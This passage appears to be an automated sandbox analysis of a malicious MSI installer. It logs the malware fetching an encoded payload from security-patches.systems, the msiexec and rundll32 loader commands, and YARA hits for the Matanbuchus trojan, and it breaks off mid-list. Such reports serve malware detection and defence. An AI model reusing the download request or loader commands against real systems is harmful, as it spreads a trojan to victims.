49 68 2b 39 2b 2b 59 6d 64 6b 7a 64 34 36 58 62 6c 36 68 69 2b 55 2f 46 76 4d 31 46 68 56 63 48 53 4a 61 48 2f 6e 61 32 Data Ascii: gUtd5CvjJm9BSdVUo3eOlmWegAhrw9zroUsd4H5/Ev99o0mcNikOl2uegQgrw1qroc0dgfxSrpdrkx3gfzkI5Orp4/Sro1ymK5kN21yPumO17Xhc/lDXVbR11VSl+IFDtBCe3GP2iK82dnVcnzdKV2kWFVSjf1L5/YLLHBYpzpMdgk6cF6nOlmkehEwXLE63bp6hjyvjXW9BSdqrXIh+9++Ymdkzd46Xbl6hi+U/FvM1FhVcHSJaH/na2
2024-12-06 21:14:10 UTC	16384	IN	Data Raw: 58 49 68 2b 48 66 51 65 71 5a 77 35 4b 34 6e 4d 79 75 36 73 41 36 79 49 65 64 59 62 6b 34 4a 30 6f 33 38 79 66 44 32 6d 6d 39 4e 59 56 34 0d 0a 59 76 55 55 69 46 54 42 65 6f 6a 70 49 74 6a 30 50 62 58 49 68 2b 39 32 75 4f 6a 51 4a 73 69 48 6e 62 67 63 61 64 37 66 57 34 65 64 7a 4e 74 6a 33 55 75 36 39 51 72 4d 72 70 37 63 78 31 4f 48 0d 0a 6e 63 7a 61 4e 46 33 42 73 68 79 64 7a 4b 37 71 58 63 4e 39 66 4b 56 32 72 5a 36 71 74 63 6a 31 4c 2f 2b 35 73 42 4e 49 4e 33 66 55 5a 70 30 7a 32 41 66 6a 6b 43 61 34 55 32 48 65 44 7a 2b 52 0d 0a 69 44 64 52 59 64 34 50 78 2f 75 69 4e 39 6a 6b 4e 62 58 49 68 39 73 33 55 57 46 56 49 65 61 48 36 62 59 78 6e 71 71 31 4e 43 68 6d 75 73 51 39 71 72 58 49 38 2b 39 76 72 70 36 71 79 51 35 34 0d 0a 46 31 47 58 4a 4c 31 4b 38 Data Ascii: XIh+HfQeqZw5K4nMyu6sA6yIedYbk4J0o38yfD2mm9NYV4YvUUiFTBeojpItj0PbXIh+92uOjQJsiHnbgcad7fW4edzNtj3Uu69QrMrp7cx1OHnczaNF3BshydzK7qXcN9fKV2rZ6qtcj1L/+5sBNIN3fUZp0z2AfjkCa4U2HeDz+RiDdRYd4Px/uiN9jkNbXIh9s3UWFVIeaH6bYxnqq1NChmusQ9qrXI8+9vrp6qyQ54F1GXJL1K8
2024-12-06 21:14:10 UTC	16384	IN	Data Raw: 67 63 69 64 61 4c 50 35 42 75 58 56 46 68 33 67 66 66 6b 4d 59 72 55 32 48 65 42 38 76 7a 0d 0a 61 39 75 72 34 6c 56 4b 76 43 32 65 75 46 4f 49 4d 55 67 33 65 4f 6c 32 72 65 4b 56 54 72 34 39 70 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 53 6c 56 68 6f 7a 38 54 66 7a 32 69 79 56 77 53 62 78 0d 0a 4e 34 2f 61 4a 4f 6e 4b 44 33 6f 58 4f 70 59 6b 6a 55 73 33 65 47 4c 59 56 71 59 51 6b 6a 64 34 59 6a 50 62 4c 49 33 43 65 6f 70 74 68 51 53 54 30 4a 68 43 4a 2b 6c 32 72 65 4b 56 54 72 34 39 0d 0a 32 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 54 5a 56 68 6f 7a 38 54 65 48 32 69 7a 68 77 53 62 78 4e 34 50 61 4a 4f 58 4b 44 33 6b 58 4f 70 59 6b 67 55 73 33 65 47 4c 59 56 71 59 51 6e 6a 64 34 0d 0a 59 6a 50 62 4c 49 48 43 65 6f 6c 74 68 51 53 51 30 4a 68 43 62 77 6f 79 51 Data Ascii: gcidaLP5BuXVFh3gffkMYrU2HeB8vza9ur4lVKvC2euFOIMUg3eOl2reKVTr49popVYVVKXKmduBSlVhoz8Tfz2iyVwSbxN4/aJOnKD3oXOpYkjUs3eGLYVqYQkjd4YjPbLI3CeopthQST0JhCJ+l2reKVTr492opVYVVKXKmduBTZVhoz8TeH2izhwSbxN4PaJOXKD3kXOpYkgUs3eGLYVqYQnjd4YjPbLIHCeolthQSQ0JhCbwoyQ
2024-12-06 21:14:10 UTC	16384	IN	Data Raw: 2f 77 50 66 71 33 31 57 6c 46 77 58 4c 67 0d 0a 34 66 4e 51 36 4e 41 6d 79 59 65 64 75 42 7a 35 33 31 75 2f 4c 64 2b 77 46 50 6c 55 79 6b 72 46 59 6b 61 2f 36 68 44 53 48 50 30 4f 7a 61 36 65 33 4d 39 66 68 70 33 4d 32 75 77 39 74 4d 69 48 0d 0a 36 37 34 31 6e 36 71 31 76 4f 30 47 7a 61 36 65 33 4e 39 58 68 70 33 4d 32 75 51 31 74 4d 69 48 4d 6c 76 56 35 56 31 61 75 76 56 4b 7a 36 36 65 76 57 30 38 68 35 33 31 46 4a 31 44 78 37 70 51 0d 0a 6e 73 79 75 4d 44 39 61 75 75 33 69 79 61 36 65 42 38 46 36 69 49 72 34 64 57 4a 56 77 37 49 6b 6e 4d 79 75 36 74 41 57 79 59 65 64 75 74 51 35 71 37 58 49 76 69 66 50 52 75 6f 59 75 72 53 35 0d 0a 49 72 68 41 36 4d 41 65 79 6f 65 64 75 42 42 6c 33 4d 39 76 68 5a 33 4d 32 69 68 64 77 37 6f 6b 6e 38 79 75 37 4d 41 65 79 Data Ascii: /wPfq31WlFwXLg4fNQ6NAmyYeduBz531u/Ld+wFPlUykrFYka/6hDSHP0Oza6e3M9fhp3M2uw9tMiH6741n6q1vO0Gza6e3N9Xhp3M2uQ1tMiHMlvV5V1auvVKz66evW08h531FJ1Dx7pQnsyuMD9auu3iya6eB8F6iIr4dWJVw7IknMyu6tAWyYedutQ5q7XIvifPRuoYurS5IrhA6MAeyoeduBBl3M9vhZ3M2ihdw7okn8yu7MAey
2024-12-06 21:14:10 UTC	16384	IN	Data Raw: 62 57 53 52 6b 31 70 62 64 53 43 4b 67 43 64 69 56 63 46 36 68 4f 70 79 4d 65 6f 51 74 72 79 64 50 2f 46 56 59 5a 6d 47 2b 37 51 33 75 4c 33 69 75 57 61 2b 4e 5a 36 34 46 47 6e 63 44 38 50 7a 0d 0a 4c 38 66 59 4c 49 48 42 59 6f 54 72 5a 71 48 71 45 4c 71 2b 50 5a 71 34 48 4a 6d 53 53 7a 64 34 59 6a 50 61 4e 4b 32 4e 64 58 78 69 4d 31 46 68 33 67 38 2f 38 32 71 36 48 49 33 65 48 39 76 78 0d 0a 4e 39 76 63 4a 4c 33 44 63 71 54 70 66 6c 6e 71 52 4d 45 31 38 53 66 58 32 69 79 78 77 33 71 59 37 32 61 78 36 41 43 53 76 44 32 2b 75 46 6b 77 33 68 2f 76 38 32 42 6a 32 69 79 70 6f 68 6d 62 0d 0a 6e 4d 7a 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 44 65 34 76 65 4b 35 58 72 34 31 6e 72 67 55 6e 64 77 50 77 2f 4d 76 78 39 67 73 72 63 46 69 67 4b 55 78 55 Data Ascii: bWSRk1pbdSCKgCdiVcF6hOpyMeoQtrydP/FVYZmG+7Q3uL3iuWa+NZ64FGncD8PzL8fYLIHBYoTrZqHqELq+PZq4HJmSSzd4YjPaNK2NdXxiM1Fh3g8/82q6HI3eH9vxN9vcJL3DcqTpflnqRME18SfX2iyxw3qY72ax6ACSvD2+uFkw3h/v82Bj2iypohmbnMzaJKnB0iWgN1GtmYb7tDe4veK5Xr41nrgUndwPw/Mvx9gsrcFigKUxU
2024-12-06 21:14:10 UTC	16384	IN	Data Raw: 58 49 31 79 76 47 4d 7a 55 57 47 2b 54 66 41 39 70 6a 4e 52 59 56 58 41 63 72 79 4c 47 46 42 68 56 61 4d 54 65 57 49 7a 30 52 79 6d 54 45 49 35 0d 0a 34 6b 36 6a 5a 69 42 78 76 44 56 71 75 42 42 70 33 68 73 37 38 36 72 62 6d 77 5a 52 53 72 77 31 62 6c 56 65 54 78 52 43 71 49 36 6d 64 79 74 6f 6b 67 2f 33 65 57 49 7a 55 59 70 53 6a 58 4b 34 0d 0a 59 6a 4e 52 59 64 38 50 39 35 47 47 4d 31 46 68 76 4a 63 33 65 47 4b 7a 4c 4a 4a 53 50 33 54 34 48 38 46 58 46 47 6a 42 59 6e 54 70 65 56 6e 71 42 30 62 66 2f 51 55 33 55 65 6f 51 51 73 56 33 0d 0a 63 6e 74 5a 42 31 70 6b 2f 2b 65 55 39 78 55 62 58 49 31 79 78 47 4d 7a 55 57 47 2b 54 66 41 39 33 6a 4e 52 59 56 58 41 63 73 53 4c 71 46 46 68 56 61 4f 6a 65 47 49 7a 30 52 79 6d 54 45 49 39 0d 0a 34 6b 36 6a 5a 43 42 Data Ascii: XI1yvGMzUWG+TfA9pjNRYVXAcryLGFBhVaMTeWIz0RymTEI54k6jZiBxvDVquBBp3hs786rbmwZRSrw1blVeTxRCqI6mdytokg/3eWIzUYpSjXK4YjNRYd8P95GGM1FhvJc3eGKzLJJSP3T4H8FXFGjBYnTpeVnqB0bf/QU3UeoQQsV3cntZB1pk/+eU9xUbXI1yxGMzUWG+TfA93jNRYVXAcsSLqFFhVaOjeGIz0RymTEI94k6jZCB

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	50133	185.234.216.175	443	1732	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 21:15:09 UTC	117	OUT	GET /verif.aspx HTTP/1.1 User-Agent: Microsoft-WNS/11.0 Host: security-patches.systems Cache-Control: no-cache
2024-12-06 21:15:09 UTC	252	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:15:09 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Sat, 23 Nov 2024 15:29:11 GMT ETag: "d75c4-62796294faafa" Accept-Ranges: bytes Content-Length: 882116 Connection: close
2024-12-06 21:15:09 UTC	7940	IN	Data Raw: 4c 32 6e 42 59 56 5a 4b 4e 33 68 6d 4d 31 46 68 71 72 55 33 65 4e 6f 7a 55 57 46 56 53 6a 64 34 49 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 56 55 6f 33 65 47 49 7a 55 57 46 56 53 6a 64 34 0d 0a 59 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 58 55 73 33 65 47 77 73 36 32 39 56 2f 6a 36 31 51 34 74 51 4c 5a 68 72 59 78 41 4c 51 48 45 52 4a 79 56 51 43 67 4e 65 63 51 49 30 4a 46 6b 58 0d 0a 46 68 4d 7a 42 48 55 34 51 68 5a 43 57 6a 39 42 45 51 56 6b 57 41 39 63 4e 51 52 37 52 7a 70 79 52 6a 4e 52 59 56 56 4b 4e 33 68 48 2f 76 68 4f 4e 4f 62 77 42 41 4f 66 6c 68 30 30 35 76 41 45 0d 0a 30 4f 32 56 48 44 2f 6d 38 41 54 51 37 5a 4d 63 6c 65 62 77 42 41 55 65 6b 68 77 6b 35 76 41 45 42 52 36 56 48 43 48 6d 38 41 54 51 37 5a 49 63 49 75 62 77 42 41 55 65 6b Data Ascii: L2nBYVZKN3hmM1FhqrU3eNozUWFVSjd4IjNRYVVKN3hiM1FhVUo3eGIzUWFVSjd4YjNRYVVKN3hiM1FhXUs3eGws629V/j61Q4tQLZhrYxALQHERJyVQCgNecQI0JFkXFhMzBHU4QhZCWj9BEQVkWA9cNQR7RzpyRjNRYVVKN3hH/vhONObwBAOflh005vAE0O2VHD/m8ATQ7ZMclebwBAUekhwk5vAEBR6VHCHm8ATQ7ZIcIubwBAUek
2024-12-06 21:15:10 UTC	16384	IN	Data Raw: 2b 36 59 2f 32 69 79 70 6f 6c 46 35 59 54 50 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 4b 37 2f 6e 61 32 5a 68 76 75 30 0d 0a 4e 37 69 39 34 72 6c 69 76 6a 57 65 41 4a 48 71 47 4c 61 2b 65 65 74 79 56 65 67 55 51 72 77 74 6e 76 51 54 5a 56 52 4b 4e 33 6a 70 64 71 32 6d 46 55 49 32 65 47 49 7a 32 69 79 70 6a 54 61 63 0d 0a 38 54 74 42 36 67 42 47 76 69 32 4b 75 42 52 70 33 41 2f 54 38 79 2f 50 30 71 42 5a 77 33 71 55 36 57 61 39 36 41 43 79 76 44 32 4b 75 68 53 42 33 67 66 54 38 53 2f 76 32 6a 53 31 77 54 58 78 0d 0a 4a 2b 76 61 4c 49 6e 42 4a 76 45 33 78 39 6f 6b 72 59 30 33 2f 42 51 37 51 65 6f 59 73 76 42 35 69 6b 56 5a 63 64 34 66 7a 2f 4d 6e 78 39 67 6a 55 63 6c 4b 6a 47 4a 47 57 4b 59 51 75 6a 64 34 0d 0a 59 6a 4f 36 61 4e 34 48 77 33 73 Data Ascii: +6Y/2iypolF5YTPaJKnB0iWgN1GtmYb7tK7/na2Zhvu0N7i94rlivjWeAJHqGLa+eetyVegUQrwtnvQTZVRKN3jpdq2mFUI2eGIz2iypjTac8TtB6gBGvi2KuBRp3A/T8y/P0qBZw3qU6Wa96ACyvD2KuhSB3gfT8S/v2jS1wTXxJ+vaLInBJvE3x9okrY03/BQ7QeoYsvB5ikVZcd4fz/Mnx9gjUclKjGJGWKYQujd4YjO6aN4Hw3s
2024-12-06 21:15:10 UTC	16384	IN	Data Raw: 36 51 43 30 4f 4d 34 6e 7a 64 53 68 49 52 48 77 50 62 6f 7a 55 57 46 56 77 58 70 6f 0d 0a 36 33 36 39 36 67 42 47 76 69 32 53 75 42 53 52 33 41 2f 37 38 79 2f 66 32 43 79 46 78 32 4b 30 36 32 61 78 70 68 43 65 4e 33 68 69 4d 39 6f 6b 64 63 4e 79 6e 4f 6c 2b 54 65 67 59 6f 72 77 74 0d 0a 69 72 6f 45 70 64 34 50 30 2f 45 6e 2b 39 77 73 6b 63 4e 36 70 4f 6c 6d 73 54 50 65 42 2b 75 51 52 67 35 51 59 62 78 64 79 49 65 64 75 42 52 70 33 67 63 72 38 7a 63 54 32 47 6e 63 47 6a 50 7a 0d 0a 4a 7a 76 61 68 41 69 4a 2b 37 53 75 2f 35 32 74 6d 59 62 37 74 44 65 34 76 54 79 57 68 76 75 30 72 76 2b 64 72 5a 6d 47 2b 37 51 33 75 4c 30 77 76 6b 4f 38 50 57 71 77 6b 58 48 63 44 7a 2f 7a 0d 0a 4c 7a 74 71 4c 46 6b 2b 41 50 4d 33 4f 39 67 30 71 63 46 36 68 49 6f 59 67 32 4e Data Ascii: 6QC0OM4nzdShIRHwPbozUWFVwXpo63696gBGvi2SuBSR3A/78y/f2CyFx2K062axphCeN3hiM9okdcNynOl+TegYorwtiroEpd4P0/En+9wskcN6pOlmsTPeB+uQRg5QYbxdyIeduBRp3gcr8zcT2GncGjPzJzvahAiJ+7Su/52tmYb7tDe4vTyWhvu0rv+drZmG+7Q3uL0wvkO8PWqwkXHcDz/zLztqLFk+APM3O9g0qcF6hIoYg2N
2024-12-06 21:15:10 UTC	16384	IN	Data Raw: 61 4f 75 6d 51 5a 36 71 74 62 37 39 0d 0a 64 73 79 75 6e 72 35 44 76 44 58 36 73 4c 68 67 33 41 65 76 2b 78 2b 72 55 52 64 4c 78 36 4a 6f 6e 63 79 75 36 4d 44 36 79 59 65 64 50 4f 63 6b 54 52 71 38 39 64 4c 4e 72 70 36 39 64 53 5a 35 0d 0a 59 74 69 43 36 74 68 61 79 49 65 64 75 4d 52 31 71 72 58 49 38 65 39 37 72 35 36 71 77 36 49 30 6e 4d 79 75 36 74 41 43 79 59 65 64 75 4e 77 74 71 37 58 49 38 53 63 2f 32 43 78 46 6a 58 4b 67 0d 0a 59 6a 4e 52 59 62 79 78 4e 33 68 69 76 73 52 42 71 37 58 49 38 54 65 6e 32 69 54 42 77 37 4a 41 6e 63 79 75 36 68 6a 65 74 41 46 32 50 43 64 74 6b 73 38 4c 68 35 33 4d 55 47 46 56 53 74 78 79 0d 0a 70 62 5a 74 6e 71 71 31 4e 33 68 69 4d 39 76 30 61 62 58 49 68 2b 70 6d 75 57 37 6a 44 39 2f 39 6f 6b 64 47 36 68 6a 65 76 47 6e Data Ascii: aOumQZ6qtb79dsyunr5DvDX6sLhg3Aev+x+rURdLx6Joncyu6MD6yYedPOckTRq89dLNrp69dSZ5YtiC6thayIeduMR1qrXI8e97r56qw6I0nMyu6tACyYeduNwtq7XI8Sc/2CxFjXKgYjNRYbyxN3hivsRBq7XI8Ten2iTBw7JAncyu6hjetAF2PCdtks8Lh53MUGFVStxypbZtnqq1N3hiM9v0abXIh+pmuW7jD9/9okdG6hjevGn
2024-12-06 21:15:10 UTC	16384	IN	Data Raw: 67 55 74 64 35 43 76 6a 4a 6d 39 42 53 64 56 55 6f 33 65 4f 6c 6d 57 65 67 41 68 72 77 39 7a 72 6f 55 73 64 34 48 35 2f 45 76 39 39 6f 30 6d 63 4e 69 6b 4f 6c 32 75 65 67 51 67 72 77 31 0d 0a 71 72 6f 63 30 64 67 66 78 53 72 70 64 72 6b 78 33 67 66 7a 6b 49 35 4f 72 70 34 2f 53 72 6f 31 79 6d 4b 35 6b 4e 32 31 79 50 75 6d 4f 31 37 58 68 63 2f 6c 44 58 56 62 52 31 31 56 53 6c 2b 49 0d 0a 46 44 74 42 43 65 33 47 50 32 69 4b 38 32 64 6e 56 63 6e 7a 64 4b 56 32 6b 57 46 56 53 6a 66 31 4c 35 2f 59 4c 4c 48 42 59 70 7a 70 4d 64 67 6b 36 63 46 36 6e 4f 6c 6d 6b 65 68 45 77 58 4c 45 0d 0a 36 33 62 70 36 68 6a 79 76 6a 58 57 39 42 53 64 71 72 58 49 68 2b 39 2b 2b 59 6d 64 6b 7a 64 34 36 58 62 6c 36 68 69 2b 55 2f 46 76 4d 31 46 68 56 63 48 53 4a 61 48 2f 6e 61 32 Data Ascii: gUtd5CvjJm9BSdVUo3eOlmWegAhrw9zroUsd4H5/Ev99o0mcNikOl2uegQgrw1qroc0dgfxSrpdrkx3gfzkI5Orp4/Sro1ymK5kN21yPumO17Xhc/lDXVbR11VSl+IFDtBCe3GP2iK82dnVcnzdKV2kWFVSjf1L5/YLLHBYpzpMdgk6cF6nOlmkehEwXLE63bp6hjyvjXW9BSdqrXIh+9++Ymdkzd46Xbl6hi+U/FvM1FhVcHSJaH/na2
2024-12-06 21:15:10 UTC	16384	IN	Data Raw: 58 49 68 2b 48 66 51 65 71 5a 77 35 4b 34 6e 4d 79 75 36 73 41 36 79 49 65 64 59 62 6b 34 4a 30 6f 33 38 79 66 44 32 6d 6d 39 4e 59 56 34 0d 0a 59 76 55 55 69 46 54 42 65 6f 6a 70 49 74 6a 30 50 62 58 49 68 2b 39 32 75 4f 6a 51 4a 73 69 48 6e 62 67 63 61 64 37 66 57 34 65 64 7a 4e 74 6a 33 55 75 36 39 51 72 4d 72 70 37 63 78 31 4f 48 0d 0a 6e 63 7a 61 4e 46 33 42 73 68 79 64 7a 4b 37 71 58 63 4e 39 66 4b 56 32 72 5a 36 71 74 63 6a 31 4c 2f 2b 35 73 42 4e 49 4e 33 66 55 5a 70 30 7a 32 41 66 6a 6b 43 61 34 55 32 48 65 44 7a 2b 52 0d 0a 69 44 64 52 59 64 34 50 78 2f 75 69 4e 39 6a 6b 4e 62 58 49 68 39 73 33 55 57 46 56 49 65 61 48 36 62 59 78 6e 71 71 31 4e 43 68 6d 75 73 51 39 71 72 58 49 38 2b 39 76 72 70 36 71 79 51 35 34 0d 0a 46 31 47 58 4a 4c 31 4b 38 Data Ascii: XIh+HfQeqZw5K4nMyu6sA6yIedYbk4J0o38yfD2mm9NYV4YvUUiFTBeojpItj0PbXIh+92uOjQJsiHnbgcad7fW4edzNtj3Uu69QrMrp7cx1OHnczaNF3BshydzK7qXcN9fKV2rZ6qtcj1L/+5sBNIN3fUZp0z2AfjkCa4U2HeDz+RiDdRYd4Px/uiN9jkNbXIh9s3UWFVIeaH6bYxnqq1NChmusQ9qrXI8+9vrp6qyQ54F1GXJL1K8
2024-12-06 21:15:10 UTC	16384	IN	Data Raw: 67 63 69 64 61 4c 50 35 42 75 58 56 46 68 33 67 66 66 6b 4d 59 72 55 32 48 65 42 38 76 7a 0d 0a 61 39 75 72 34 6c 56 4b 76 43 32 65 75 46 4f 49 4d 55 67 33 65 4f 6c 32 72 65 4b 56 54 72 34 39 70 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 53 6c 56 68 6f 7a 38 54 66 7a 32 69 79 56 77 53 62 78 0d 0a 4e 34 2f 61 4a 4f 6e 4b 44 33 6f 58 4f 70 59 6b 6a 55 73 33 65 47 4c 59 56 71 59 51 6b 6a 64 34 59 6a 50 62 4c 49 33 43 65 6f 70 74 68 51 53 54 30 4a 68 43 4a 2b 6c 32 72 65 4b 56 54 72 34 39 0d 0a 32 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 54 5a 56 68 6f 7a 38 54 65 48 32 69 7a 68 77 53 62 78 4e 34 50 61 4a 4f 58 4b 44 33 6b 58 4f 70 59 6b 67 55 73 33 65 47 4c 59 56 71 59 51 6e 6a 64 34 0d 0a 59 6a 50 62 4c 49 48 43 65 6f 6c 74 68 51 53 51 30 4a 68 43 62 77 6f 79 51 Data Ascii: gcidaLP5BuXVFh3gffkMYrU2HeB8vza9ur4lVKvC2euFOIMUg3eOl2reKVTr49popVYVVKXKmduBSlVhoz8Tfz2iyVwSbxN4/aJOnKD3oXOpYkjUs3eGLYVqYQkjd4YjPbLI3CeopthQST0JhCJ+l2reKVTr492opVYVVKXKmduBTZVhoz8TeH2izhwSbxN4PaJOXKD3kXOpYkgUs3eGLYVqYQnjd4YjPbLIHCeolthQSQ0JhCbwoyQ
2024-12-06 21:15:10 UTC	16384	IN	Data Raw: 2f 77 50 66 71 33 31 57 6c 46 77 58 4c 67 0d 0a 34 66 4e 51 36 4e 41 6d 79 59 65 64 75 42 7a 35 33 31 75 2f 4c 64 2b 77 46 50 6c 55 79 6b 72 46 59 6b 61 2f 36 68 44 53 48 50 30 4f 7a 61 36 65 33 4d 39 66 68 70 33 4d 32 75 77 39 74 4d 69 48 0d 0a 36 37 34 31 6e 36 71 31 76 4f 30 47 7a 61 36 65 33 4e 39 58 68 70 33 4d 32 75 51 31 74 4d 69 48 4d 6c 76 56 35 56 31 61 75 76 56 4b 7a 36 36 65 76 57 30 38 68 35 33 31 46 4a 31 44 78 37 70 51 0d 0a 6e 73 79 75 4d 44 39 61 75 75 33 69 79 61 36 65 42 38 46 36 69 49 72 34 64 57 4a 56 77 37 49 6b 6e 4d 79 75 36 74 41 57 79 59 65 64 75 74 51 35 71 37 58 49 76 69 66 50 52 75 6f 59 75 72 53 35 0d 0a 49 72 68 41 36 4d 41 65 79 6f 65 64 75 42 42 6c 33 4d 39 76 68 5a 33 4d 32 69 68 64 77 37 6f 6b 6e 38 79 75 37 4d 41 65 79 Data Ascii: /wPfq31WlFwXLg4fNQ6NAmyYeduBz531u/Ld+wFPlUykrFYka/6hDSHP0Oza6e3M9fhp3M2uw9tMiH6741n6q1vO0Gza6e3N9Xhp3M2uQ1tMiHMlvV5V1auvVKz66evW08h531FJ1Dx7pQnsyuMD9auu3iya6eB8F6iIr4dWJVw7IknMyu6tAWyYedutQ5q7XIvifPRuoYurS5IrhA6MAeyoeduBBl3M9vhZ3M2ihdw7okn8yu7MAey
2024-12-06 21:15:10 UTC	16384	IN	Data Raw: 62 57 53 52 6b 31 70 62 64 53 43 4b 67 43 64 69 56 63 46 36 68 4f 70 79 4d 65 6f 51 74 72 79 64 50 2f 46 56 59 5a 6d 47 2b 37 51 33 75 4c 33 69 75 57 61 2b 4e 5a 36 34 46 47 6e 63 44 38 50 7a 0d 0a 4c 38 66 59 4c 49 48 42 59 6f 54 72 5a 71 48 71 45 4c 71 2b 50 5a 71 34 48 4a 6d 53 53 7a 64 34 59 6a 50 61 4e 4b 32 4e 64 58 78 69 4d 31 46 68 33 67 38 2f 38 32 71 36 48 49 33 65 48 39 76 78 0d 0a 4e 39 76 63 4a 4c 33 44 63 71 54 70 66 6c 6e 71 52 4d 45 31 38 53 66 58 32 69 79 78 77 33 71 59 37 32 61 78 36 41 43 53 76 44 32 2b 75 46 6b 77 33 68 2f 76 38 32 42 6a 32 69 79 70 6f 68 6d 62 0d 0a 6e 4d 7a 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 44 65 34 76 65 4b 35 58 72 34 31 6e 72 67 55 6e 64 77 50 77 2f 4d 76 78 39 67 73 72 63 46 69 67 4b 55 78 55 Data Ascii: bWSRk1pbdSCKgCdiVcF6hOpyMeoQtrydP/FVYZmG+7Q3uL3iuWa+NZ64FGncD8PzL8fYLIHBYoTrZqHqELq+PZq4HJmSSzd4YjPaNK2NdXxiM1Fh3g8/82q6HI3eH9vxN9vcJL3DcqTpflnqRME18SfX2iyxw3qY72ax6ACSvD2+uFkw3h/v82Bj2iypohmbnMzaJKnB0iWgN1GtmYb7tDe4veK5Xr41nrgUndwPw/Mvx9gsrcFigKUxU
2024-12-06 21:15:10 UTC	16384	IN	Data Raw: 58 49 31 79 76 47 4d 7a 55 57 47 2b 54 66 41 39 70 6a 4e 52 59 56 58 41 63 72 79 4c 47 46 42 68 56 61 4d 54 65 57 49 7a 30 52 79 6d 54 45 49 35 0d 0a 34 6b 36 6a 5a 69 42 78 76 44 56 71 75 42 42 70 33 68 73 37 38 36 72 62 6d 77 5a 52 53 72 77 31 62 6c 56 65 54 78 52 43 71 49 36 6d 64 79 74 6f 6b 67 2f 33 65 57 49 7a 55 59 70 53 6a 58 4b 34 0d 0a 59 6a 4e 52 59 64 38 50 39 35 47 47 4d 31 46 68 76 4a 63 33 65 47 4b 7a 4c 4a 4a 53 50 33 54 34 48 38 46 58 46 47 6a 42 59 6e 54 70 65 56 6e 71 42 30 62 66 2f 51 55 33 55 65 6f 51 51 73 56 33 0d 0a 63 6e 74 5a 42 31 70 6b 2f 2b 65 55 39 78 55 62 58 49 31 79 78 47 4d 7a 55 57 47 2b 54 66 41 39 33 6a 4e 52 59 56 58 41 63 73 53 4c 71 46 46 68 56 61 4f 6a 65 47 49 7a 30 52 79 6d 54 45 49 39 0d 0a 34 6b 36 6a 5a 43 42 Data Ascii: XI1yvGMzUWG+TfA9pjNRYVXAcryLGFBhVaMTeWIz0RymTEI54k6jZiBxvDVquBBp3hs786rbmwZRSrw1blVeTxRCqI6mdytokg/3eWIzUYpSjXK4YjNRYd8P95GGM1FhvJc3eGKzLJJSP3T4H8FXFGjBYnTpeVnqB0bf/QU3UeoQQsV3cntZB1pk/+eU9xUbXI1yxGMzUWG+TfA93jNRYVXAcsSLqFFhVaOjeGIz0RymTEI94k6jZCB

Target ID:	0
Start time:	16:11:01
Start date:	06/12/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\klog.php.msi"
Imagebase:	0x7ff6a8af0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	16:11:01
Start date:	06/12/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff6a8af0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	16:11:01
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 7D4FE581FB47C85FAEE5D96881C26D11
Imagebase:	0x4f0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	16:11:02
Start date:	06/12/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init
Imagebase:	0x7ff68a910000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	16:11:02
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init
Imagebase:	0x3a0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000004.00000002.4167564945.0000000005395000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000004.00000002.4167564945.0000000005395000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000004.00000002.4167344781.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Matanbuchus_58a61aaa, 